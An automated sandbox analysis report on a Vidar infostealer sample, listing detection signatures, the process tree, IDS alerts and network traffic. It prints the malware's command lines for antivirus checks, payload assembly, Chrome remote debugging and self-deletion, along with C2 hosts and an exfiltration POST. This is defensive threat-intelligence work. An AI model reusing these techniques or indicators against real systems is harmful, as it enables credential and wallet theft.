Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CenteredDealing.exe

Overview

General Information

Sample name:CenteredDealing.exe
Analysis ID:1582918
MD5:228e734f246564bb255b68d51bd6d31e
SHA1:13a36ae7bd290f4d7aba808d4435eb04008d3ac8
SHA256:7174de5abf7299d3c6ab5460d57ff110be491dc47325c24465281200852f0f9a
Tags:exeuser-SquiblydooBlog
Infos:

Detection

Vidar
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
Drops PE files with a suspicious file extension
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • CenteredDealing.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\CenteredDealing.exe" MD5: 228E734F246564BB255B68D51BD6D31E)
    • cmd.exe (PID: 7472 cmdline: "C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7552 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7560 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7596 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7604 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7640 cmdline: cmd /c md 208639 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7656 cmdline: extrac32 /Y /E Dodge MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7692 cmdline: findstr /V "Borough" Architecture MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7708 cmdline: cmd /c copy /b 208639\Rip.com + Preparing + Functional + Sends + Petroleum + Root + Exhibitions + Sexuality + State + Bridal + Cartoons 208639\Rip.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7724 cmdline: cmd /c copy /b ..\Vienna + ..\Winston + ..\Assumptions + ..\Interactive + ..\Keith + ..\Anaheim + ..\Kuwait + ..\Jackson d MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Rip.com (PID: 7740 cmdline: Rip.com d MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 8112 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 6632 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2248,i,8807016753924455708,494945956636832541,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • cmd.exe (PID: 6920 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com" & rd /s /q "C:\ProgramData\8ycbs" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6476 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 7756 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Sigma Signatures

    Sigma detected: Browser Started with Remote Debugging
    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Rip.com d, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com, ParentProcessId: 7740, ParentProcessName: Rip.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 8112, ProcessName: chrome.exe

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Sigma detected: Search for Antivirus process
    Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7472, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7604, ProcessName: findstr.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T21:40:11.953332+010020442471Malware Command and Control Activity Detected116.203.13.109443192.168.2.449741TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T21:40:13.382548+010020518311Malware Command and Control Activity Detected116.203.13.109443192.168.2.449742TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T21:40:13.382414+010020490871A Network Trojan was detected192.168.2.449742116.203.13.109443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T21:40:09.232471+010028593781Malware Command and Control Activity Detected192.168.2.449739116.203.13.109443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
    Source: CenteredDealing.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49737 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 116.203.13.109:443 -> 192.168.2.4:49738 version: TLS 1.2
    Source: CenteredDealing.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: chrome.exeMemory has grown: Private usage: 9MB later: 41MB

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49742 -> 116.203.13.109:443
    Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49739 -> 116.203.13.109:443
    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.13.109:443 -> 192.168.2.4:49741
    Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.13.109:443 -> 192.168.2.4:49742
    Source: global trafficHTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
    Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
    Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
    Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
    Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: h7h7h7.onlineConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: chrome.exe, 00000011.00000003.1998992456.0000211001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1998720449.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1999027137.000021100100C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
    Source: chrome.exe, 00000011.00000003.1998992456.0000211001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1998720449.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1999027137.000021100100C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
    Source: global trafficDNS traffic detected: DNS query: uVsReHLpkvXMkPFzJmRm.uVsReHLpkvXMkPFzJmRm
    Source: global trafficDNS traffic detected: DNS query: t.me
    Source: global trafficDNS traffic detected: DNS query: h7h7h7.online
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: apis.google.com
    Source: global trafficDNS traffic detected: DNS query: play.google.com
    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----s2n79hdjwbsjmyu37gvkUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: h7h7h7.onlineContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
    Source: chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
    Source: chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
    Source: chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
